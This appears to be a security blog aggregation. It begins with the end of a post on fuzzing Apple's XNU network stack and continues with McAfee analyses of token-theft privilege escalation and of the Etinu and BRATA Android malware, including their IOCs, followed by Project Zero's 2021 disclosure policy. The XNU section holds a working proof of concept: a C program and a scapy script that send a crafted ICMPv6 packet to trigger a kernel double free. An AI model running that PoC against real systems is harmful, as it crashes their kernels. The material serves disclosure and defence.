In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>

#define __APPLE_USE_RFC_3542

#include <netinet/in.h>

#include <stdio.h>

#include <unistd.h>

int main() {

    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);

    if (fd < 0) {

        printf("failed\n");

        return 0;

    }

    int res;

    // This is not needed to cause a crash on macOS 10.14.6, but you can

    // try setting this option if you can't reproduce the issue.

    // int space = 1;

    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

    // printf("res1: %d\n", res);

    int enable = 1;

    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));

    printf("res2: %d\n", res);

    // Keep the socket open without terminating.

    while (1) {

        sleep(5);

    }

    close(fd);

    return 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)

print(raw(outer).hex())

p = sr1(outer)

if p:

    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

New “Always-on” Application for MacOS (April updates)

22 April 2021 at 08:27
New “Always-on” Application for MacOS (April updates)

As cyberattacks targeting mobile devices are on the rise, we continue to see massive adoption from both the private and public sectors. We are really excited to share two new features which will dramatically improve the ZecOps experience! 

New “Always-on” Application for MacOS

ZecOps is making it even easier for users to perform complex investigations of their mobile devices. Now, users can inspect their mobile devices automatically each time the phone is connected to their laptop. ZecOps for Mobile supports both iOS and Android.

Send an inspection link to a customer or colleague

ZecOps administrators now have the ability to generate a unique link to download the ZecOps Collector App from the ZecOps Dashboard. The link can then be shared with the person/group whose device you wish to inspect via email, text, or Slack.

The Collector App can be downloaded on any laptop. This feature is ideal for incident responders, managed service providers, and SOC operators.

Learn more about ZecOps Mobile EDR

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation

20 April 2021 at 15:27
how to run a virus scan

Executive Summary

Many malware attacks designed to inflict damage on a network are armed with lateral movement capabilities. Post initial infection, such malware would usually need to perform a higher privileged task or execute a privileged command on the compromised system to be able to further enumerate the infection targets and compromise more systems on the network. Consequently, at some point during its lateral movement activities, it would need to escalate its privileges using one or the other privilege escalation techniques. Once malware or an attacker successfully escalates its privileges on the compromised system, it will acquire the ability to perform stealthier lateral movement, usually executing its tasks under the context of a privileged user, as well as bypassing mitigations like User Account Control.

Process access token manipulation is one such privilege escalation technique which is widely adopted by malware authors. These set of techniques include process access token theft and impersonation, which eventually allows malware to advance its lateral movement activities across the network in the context of another logged in user or higher privileged user.

When a user authenticates to Windows via console (interactive logon), a logon session is created, and an access token is granted to the user. Windows manages the identity, security, or access rights of the user on the system with this access token, essentially determining what system resources they can access and what tasks can be performed. An access token for a user is primarily a kernel object and an identification of that user in the system, which also contains many other details like groups, access rights, integrity level of the process, privileges, etc. Fundamentally, a user’s logon session has an access token which also references their credentials to be used for Windows single sign on (SSO) authentication to access the local or remote network resources.

Once the attacker gains an initial foothold on the target by compromising the initial system, they would want to move around the network laterally to access more resource or critical assets. One of the ways for an attacker to achieve this is to use the identity or credentials of already logged-on users on the compromised machine to pivot to other systems or escalate their privileges and perform the lateral movement in the context of another logged on higher privileged user. Process access token manipulation helps the attackers to precisely accomplish this goal.

For our YARA rule, MITRE ATT&CK techniques and to learn more about the technical details of token manipulation attacks and how malware executes these attacks successfully at the code level, read our complete technical analysis here.

Coverage

McAfee On-Access-Scan has a generic detection for this nature of malware  as shown in the below screenshot:

Additionally, the YARA rule mentioned at the end of the technical analysis document can also be used to detect the token manipulation attacks by importing the rule in the Threat detection solutions like McAfee Advance Threat Defence, this behaviour can be detected.

Summary of the Threat

Several types of malware and advanced persistent threats abuse process tokens to gain elevated privileges on the system. Malware can take multiple routes to achieve this goal. However, in all these routes, it would abuse the Windows APIs to execute the token stealing or token impersonation to gain elevated privileges and advance its lateral movement activities.

  • If the current logged on user on the compromised or infected machine is a part of the administrator group of users OR running a process with higher privileges (e.g., by using “runas” command), malware can abuse the privileges of the process’s access token to elevate its privileges on the system, thereby enabling itself to perform privileged tasks.
  • Malware can use multiple Windows APIs to enumerate the Windows processes running with higher privileges (usually SYSTEM level privileges), acquire the access tokens of those processes and start new processes with the acquired token. This results in the new process being started in the context of the user represented by the token, which is SYSTEM.
  • Malware can also execute a token impersonation attack where it can duplicate the access tokens of the higher privileged SYSTEM level process, convert it into the impersonation token by using appropriate Windows functionality and then impersonate the SYSTEM user on the infected machine, thereby elevating its privileges.
  • These token manipulation attacks will allow malware to use the credentials of the current logged on user or the credentials of another privileged user to authenticate to the remote network resource, leading to advancement of its lateral movement activities.
  • These attack techniques allows malware to bypass multiple mitigations like UAC, access control lists, heuristics detection techniques and allowing malware to remain stealthier while moving laterally inside the network.

 

Access Token Theft and Manipulation Attacks – Technical Analysis

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation.

Read Now

 

The post Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation appeared first on McAfee Blog.

Clever Billing Fraud Applications on Google Play: Etinu

19 April 2021 at 21:42
Saibāsekyuriti

Authored by: Sang Ryol Ryu and Chanung Pak

A new wave of fraudulent apps has made its way to the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula as well—to the tune of more than 700,000 downloads before detection by McAfee Mobile Research and co-operation with Google to remove the apps.

Figure 1. Infected Apps on Google Play

Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases. While apps go through a review process to ensure that they are legitimate, these fraudulent apps made their way into the store by submitting a clean version of the app for review and then introducing the malicious code via updates to the app later.

Figure 2. Negative reviews on Google Play

McAfee Mobile Security detects this threat as Android/Etinu and alerts mobile users if they are present. The McAfee Mobile Research team continues to monitor this threat and is likewise continuing its co-operation with Google to remove these and other malicious applications on Google Play.

Technical analysis

In terms of details, the malware embedded in these apps takes advantage of dynamic code loading. Encrypted payloads of malware appear in the assets folder associated with the app, using names such as “cache.bin,” “settings.bin,” “data.droid,” or seemingly innocuous “.png” files, as illustrated below.

Figure 3. Encrypted resource sneaked into the assets folder

Figure 4. Decryption flow

The figure above shows the decryption flow. Firstly, the hidden malicious code in the main .apk opens “1.png” file in the assets folder, decrypts it to “loader.dex,” and then loads the dropped .dex. The “1.png” is encrypted using RC4 with the package name as the key. The first payload creates HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It requests keys from the servers for the AES encrypted second payload, “2.png”. And the server returns the key as the “s” value of JSON. Also, this malware has self-update function. When the server responds “URL” value, the content in the URL is used instead of “2.png”. However, servers do not always respond to the request or return the secret key.

Figure 5. Updated payload response

As always, the most malicious functions reveal themselves in the final stage. The malware hijacks the Notification Listener to steal incoming SMS messages like Android Joker malware does, without the SMS read permission. Like a chain system, the malware then passes the notification object to the final stage. When the notification has arisen from the default SMS package, the message is finally sent out using WebView JavaScript Interface.

Figure 6. Notification delivery flow

As a result of our additional investigation on C2 servers, following information was found, including carrier, phone number, SMS message, IP address, country, network status, and so forth—along with auto-renewing subscriptions:

Figure 7. Leaked data

Further threats like these to come?

We expect that threats which take advantage of Notification Listener will continue to flourish. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove it. Further, using McAfee Mobile Security can detect such threats and protect you from them via its regular updates. However, it’s important to pay attention to apps that request SMS-related permissions and Notification Listener permissions. Simply put, legitimate photo and wallpaper apps simply won’t ask for those because they’re not necessary for such apps to run. If a request seems suspicious, don’t allow it.

Technical Data and IOCs

MITRE ATT&CK Matrix

IoCs

08C4F705D5A7C9DC7C05EDEE3FCAD12F345A6EE6832D54B758E57394292BA651 com.studio.keypaper2021
CC2DEFEF5A14F9B4B9F27CC9F5BBB0D2FC8A729A2F4EBA20010E81A362D5560C com.pip.editor.camera
007587C4A84D18592BF4EF7AD828D5AAA7D50CADBBF8B0892590DB48CCA7487E org.my.favorites.up.keypaper
08FA33BC138FE4835C15E45D1C1D5A81094E156EEF28D02EA8910D5F8E44D4B8 com.super.color.hairdryer
9E688A36F02DD1B1A9AE4A5C94C1335B14D1B0B1C8901EC8C986B4390E95E760 com.ce1ab3.app.photo.editor
018B705E8577F065AC6F0EDE5A8A1622820B6AEAC77D0284852CEAECF8D8460C com.hit.camera.pip
0E2ACCFA47B782B062CC324704C1F999796F5045D9753423CF7238FE4CABBFA8 com.daynight.keyboard.wallpaper
50D498755486D3739BE5D2292A51C7C3D0ADA6D1A37C89B669A601A324794B06 com.super.star.ringtones

URLs

d37i64jgpubcy4.cloudfront.net

d1ag96m0hzoks5.cloudfront.net

dospxvsfnk8s8.cloudfront.net

d45wejayb5ly8.cloudfront.net

d3u41fvcv6mjph.cloudfront.net

d3puvb2n8wcn2r.cloudfront.net

d8fkjd2z9mouq.cloudfront.net

d22g8hm4svq46j.cloudfront.net

d3i3wvt6f8lwyr.cloudfront.net

d1w5drh895wnkz.cloudfront.net

The post Clever Billing Fraud Applications on Google Play: Etinu appeared first on McAfee Blog.

Policy and Disclosure: 2021 Edition

By: Ryan
15 April 2021 at 16:02

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

 

We remain committed to adapting our policies and practices to best achieve our mission,  demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.




    In-the wild vulnerabilities are not offered a grace period
    *

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix.  For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges

13 April 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: April 2021.

In this edition, we present new findings in our traditional threat statistical categories – as well as our usual malware, sectors, and vectors – imparted in a new, enhanced digital presentation that’s more easily consumed and interpreted.

Historically, our reports detailed the volume of key threats, such as “what is in the malware zoo.” The introduction of MVISION Insights in 2020 has since made it possible to track the prevalence of campaigns, as well as, their associated IoCs, and determine the in-field detections. This latest report incorporates not only the malware zoo but new analysis for what is being detected in the wild.

The Q3 and Q4 2020 findings include:

  • COVID-19-themed cyber-attack detections increased 114%
  • New malware samples averaging 648 new threats per minute
  • 1 million external attacks observed against MVISION Cloud user accounts
  • Powershell threats spiked 208%
  • Mobile malware surged 118%

Additional Q3 and Q4 2020 content includes:

  • Leading MITRE ATT&CK techniques
  • Prominent exploit vulnerabilities
  • McAfee research of the prolific SUNBURST/SolarWinds campaign

These new, insightful additions really make for a bumper report! We hope you find this new McAfee Labs threat report presentation and data valuable.

Don’t forget keep track of the latest campaigns and continuing threat coverage by visiting our McAfee COVID-19 Threats Dashboard and the MVISION Insights preview dashboard.

The post McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges appeared first on McAfee Blog.

BRATA Keeps Sneaking into Google Play, Now Targeting USA and Spain

12 April 2021 at 16:13
How to check for viruses

Recently, the McAfee Mobile Research Team uncovered several new variants of the Android malware family BRATA being distributed in Google Play, ironically posing as app security scanners.

These malicious apps urge users to update Chrome, WhatsApp, or a PDF reader, yet instead of updating the app in question, they take full control of the device by abusing accessibility services. Recent versions of BRATA were also seen serving phishing webpages targeting users of financial entities, not only in Brazil but also in Spain and the USA.

In this blog post we will provide an overview of this threat, how does this malware operates and its main upgrades compared with earlier versions. If you want to learn more about the technical details of this threat and the differences between all variants you can check the BRATA whitepaper here.

The origins of BRATA

First seen in the wild at the end of 2018 and named “Brazilian Remote Access Tool Android ” (BRATA) by Kaspersky, this “RAT” initially targeted users in Brazil and then rapidly evolved into a banking trojan. It combines full device control capabilities with the ability to display phishing webpages that steal banking credentials in addition to abilities that allow it capture screen lock credentials (PIN, Password or Pattern), capture keystrokes (keylogger functionality), and record the screen of the infected device to monitor a user’s actions without their consent.

Because BRATA is distributed mainly on Google Play, it allows bad actors to lure victims into installing these malicious apps pretending that there is a security issue on the victim’s device and asking to install a malicious app to fix the problem. Given this common ruse, it is recommended to avoid clicking on links from untrusted sources that pretend to be a security software which scans and updates your system—e even if that link leads to an app in Google Play. McAfee offers protection against this threat via McAfee Mobile Security, which detects this malware as Android/Brata.

How BRATA Android malware has evolved and targets new victims

The main upgrades and changes that we have identified in the latest versions of BRATA recently found in Google Play include:

  • Geographical expansion: Initially targeting Brazil, we found that recent variants started to also target users in Spain and the USA.
  • Banking trojan functionality: In addition to being able to have full control of the infected device by abusing accessibility services, BRATA is now serving phishing URLs based on the presence of certain financial and banking apps defined by the remote command and control server.
  • Self-defense techniques: New BRATA variants added new protection layers like string obfuscation, encryption of configuration files, use of commercial packers, and the move of its core functionality to a remote server so it can be easily updated without changing the main application. Some BRATA variants also check first if the device is worth being attacked before downloading and executing their main payload, making it more evasive to automated analysis systems.

BRATA in Google Play

During 2020, the threat actors behind BRATA have managed to publish several apps in Google Play, most of them reaching between one thousand to five thousand installs. However, also a few variants have reached 10,000 installs including the latest one, DefenseScreen, reported to Google by McAfee in October and later removed from Google Play.

Figure 1. DefenseScreen app in Google Play.

From all BRATA apps that were in Google Play in 2020, five of them caught our attention as they have notable improvements compared with previous ones. We refer to them by the name of the developer accounts:

Figure 2. Timeline of identified apps in Google Play from May to October 2020

Social engineering tricks

BRATA poses as a security app scanner that pretends to scan all the installed apps, while in the background it checks if any of the target apps provided by a remote server are installed in the user’s device. If that is the case, it will urge the user to install a fake update of a specific app selected depending on the device language. In the case of English-language apps, BRATA suggests the update of Chrome while also constantly showing a notification at the top of the screen asking the user to activate accessibility services:

Figure 3. Fake app scanning functionality

Once the user clicks on “UPDATE NOW!”, BRATA proceeds to open the main Accessibility tab in Android settings and asks the user to manually find the malicious service and grant permissions to use accessibility services. When the user attempts to do this dangerous action, Android warns of the potential risks of granting access to accessibility services to a specific app, including that the app can observe your actions, retrieve content from Windows, and perform gestures like tap, swipe, and pinch.

As soon as the user clicks on OK the persistent notification goes away, the main icon of the app is hidden and a full black screen with the word “Updating” appears, which could be used to hide automated actions that now can be performed with the abuse of accessibility services:

Figure 4. BRATA asking access to accessibility services and showing a black screen to potentially hide automated actions

At this point, the app is completely hidden from the user, running in the background in constant communication with a command and control server run by the threat actors. The only user interface that we saw when we analyzed BRATA after the access to accessibility services was granted was the following screen, created by the malware to steal the device PIN and use it to unlock it when the phone is unattended. The screen asks the user to confirm the PIN, validating it with the real one because when an incorrect PIN is entered, an error message is shown and the screen will not disappear until the correct PIN is entered:

Figure 5. BRATA attempting to steal device PIN and confirming if the correct one is provided

BRATA capabilities

Once the malicious app is executed and accessibility permissions have been granted, BRATA can perform almost any action in the compromised device. Here’s the list of commands that we found in all the payloads that we have analyzed so far:

  • Steal lock screen (PIN/Password/Pattern)
  • Screen Capture: Records the device’s screen and sends screenshots to the remote server
  • Execute Action: Interact with user’s interface by abusing accessibility services
  • Unlock Device: Use stolen PIN/Password/Pattern to unlock the device
  • Start/Schedule activity lunch: Opens a specific activity provided by the remote server
  • Start/Stop Keylogger: Captures user’s input on editable fields and leaks that to a remote server
  • UI text injection: Injects a string provided by the remote server in an editable field
  • Hide/Unhide Incoming Calls: Sets the ring volume to 0 and creates a full black screen to hide an incoming call
  • Clipboard manipulation: Injects a string provided by the remote server in the clipboard

In addition to the commands above, BRATA also performs automated actions by abusing accessibility services to hide itself from the user or automatically grant privileges to itself:

  • Hides the media projection warning message that explicitly warns the user that the app will start capturing everything displayed on the screen.
  • Grants itself any permissions by clicking on the “Allow” button when the permission dialog appears in the screen.
  • Disables Google Play Store and therefore Google Play Protect.
  • Uninstalls itself in case that the Settings interface of itself with the buttons “Uninstall” and “Force Stop” appears in the screen.

Geographical expansion and Banking Trojan Functionality

Earlier BRATA versions like OutProtect and PrivacyTitan were designed to target Brazilian users only by limiting its execution to devices set to the Portuguese language in Brazil. However, in June we noticed that threat actors behind BRATA started to add support to other languages like Spanish and English. Depending on the language configured in the device, the malware suggested that one of the following three apps needed an urgent update: WhatsApp (Spanish), a non-existent PDF Reader (Portuguese) and Chrome (English):

Figure 6. Apps falsely asked to be updated depending on the device language

In addition to the localization of the user-interface strings, we also noticed that threat actors have updated the list of targeted financial apps to add some from Spain and USA. In September, the target list had around 52 apps but only 32 had phishing URLs. Also, from the 20 US banking apps present in the last target list only 5 had phishing URLs. Here’s an example of phishing websites that will be displayed to the user if specific US banking apps are present in the compromised device:

Figure 7. Examples of phishing websites pretending to be from US banks

Multiple Obfuscation Layers and Stages

Throughout 2020, BRATA constantly evolved, adding different obfuscation layers to impede its analysis and detection. One of the first major changes was moving its core functionality to a remote server so it can be easily updated without changing the original malicious application. The same server is used as a first point of contact to register the infected device, provide an updated list of targeted financial apps, and then deliver the IP address and port of the server that will be used by the attackers to execute commands remotely on the compromised device:

 

Figure 8. BRATA high level network communication

Additional protection layers include string obfuscation, country and language check, encryption of certain key strings in assets folder, and, in latest variants, the use of a commercial packer that further prevents the static and dynamic analysis of the malicious apps. The illustration below provides a summary of the different protection layers and execution stages present in the latest BRATA variants:

Figure 9. BRATA protection layers and execution stages

Prevention and defense

In order get infected with BRATA ,users must install the malicious application from Google Play so below are some recommendations to avoid being tricked by this or any other Android threats that use social engineering to convince users to install malware that looks legitimate:

  • Don’t trust an Android application just because it’s available in the official store. In this case, victims are mainly lured to install an app that promises a more secure device by offering a fake update. Keep in mind that in Android updates are installed automatically via Google Play so users shouldn’t require the installation of a third-party app to have the device up to date.
  • McAfee Mobile Security will alert users if they are attempting to install or execute a malware even if it’s downloaded from Google Play. We recommend users to have a reliable and updated antivirus installed on their mobile devices to detect this and other malicious applications.
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person, because it could lead to the download of a malicious application.
  • Before installing an app, check the developer information, requested permissions, the number of installations, and the content of the reviews. Sometimes applications could have very good rating but most of the reviews could be fake, such as we uncovered in Android/LeifAccess. Be aware that ranking manipulation happens and that reviews are not always trustworthy.

The activation of accessibility services is very sensitive in Android and key to the successful execution of this banking trojan because, once the access to those services is granted, BRATA can perform all the malicious activities and take control of the device. For this reason, Android users must be very careful when granting this access to any app.

Accessibility services are so powerful that in hands of a malicious app they could be used to fully compromise your device data, your online banking and finances, and your digital life overall.

BRATA Android malware continues to evolve—another good reason for protecting mobile devices

When BRATA was initially discovered in 2019 and named “Brazilian Android RAT” by Kaspersky, it was said that, theoretically, the malware can be used to target other users if the cybercriminals behind this threat wanted to do it. Based on the newest variants found in 2020, the theory has become reality, showing that this threat is currently very active, constantly adding new targets, new languages and new protection layers to make its detection and analysis more difficult.

